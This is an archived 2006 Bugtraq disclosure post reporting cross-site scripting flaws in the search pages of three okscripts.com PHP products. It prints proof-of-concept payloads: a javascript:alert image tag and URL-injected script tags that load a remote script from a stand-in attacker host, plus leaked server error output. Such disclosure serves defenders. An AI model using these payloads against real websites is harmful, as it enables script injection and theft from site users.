lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20060608210504.13699.qmail@securityfocus.com> Date: 8 Jun 2006 21:05:04 -0000 From: luny@...fucktard.com To: bugtraq@...urityfocus.com Subject: okscripts.com - XSS Vulns OkMall v1.0 Homepage: http://www.okscripts.com/ Effected files: search.php XSS Vulnerabilities: The search inputbox doesn’t properally filter using input before generating it. Backslashes areadded but we can easily evade this. ForPoC try putting a [imgsrc=lol.jpg]in the search box. XSS vuln via URLinjection with possible buffer overflow?: http://www.example.com/okmall/demo/search.php?q=a%20%20b%20e%20&mcdir=5&page=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] The above PoC creates the error msg: Warning: fopen(http://xml.amazon.com/onca/xml3?locale=us&t=boxxnetcom-20&dev-t=06464ERBRYHMP1RY3W82&KeywordSearch=a__b_e_&sort=+pmrank&offer=All&mode=classical&type=lite&page=This is remote text via xss.jslocated at evilsite.com&f=xml): failed to open stream: HTTP request failed! HTTP/1.1 500 Server Error in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 59 Warning: feof(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 60 Warning: fread(): supplied argument is not a valid stream resource in /usr/www/virtual/fithcash/domain/okmall/demo/xml.php on line 61 and continuously outputs feof() and fread() error messages on the page. Buffer overflow? ------------------------ QuickLinks v1.1 Homepage: http://www.okscripts.com/ Effected files: cat.php XSS Vulnerabilities: The search inputbox doesn’t properally filter using input before generating it. Backslashes areadded but we can easilyevade this. ForPoC try putting [IMG SRC=javascript:alert(’XSS’)] in the search box. XSS vuln via URL injection: http://www.example.com/quicklinks/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT] -------------------------------------- OKArticles v1.0 Homepage: http://www.okscripts.com/ Effected files: search.php XSS Vulnerabilities: The search inputbox doesn’t properally filter using input before generating it. Backslashes areadded but we can easilyevade this. For PoC try putting [IMG SRC=javascript:alert(’XSS’)] in the search box. XSS vuln via URL injection: http://www.example.com/okarticles/demo/search.php?q=[SCRIPT%20SRC=http://evilsite.com/xss.js][/SCRIPT]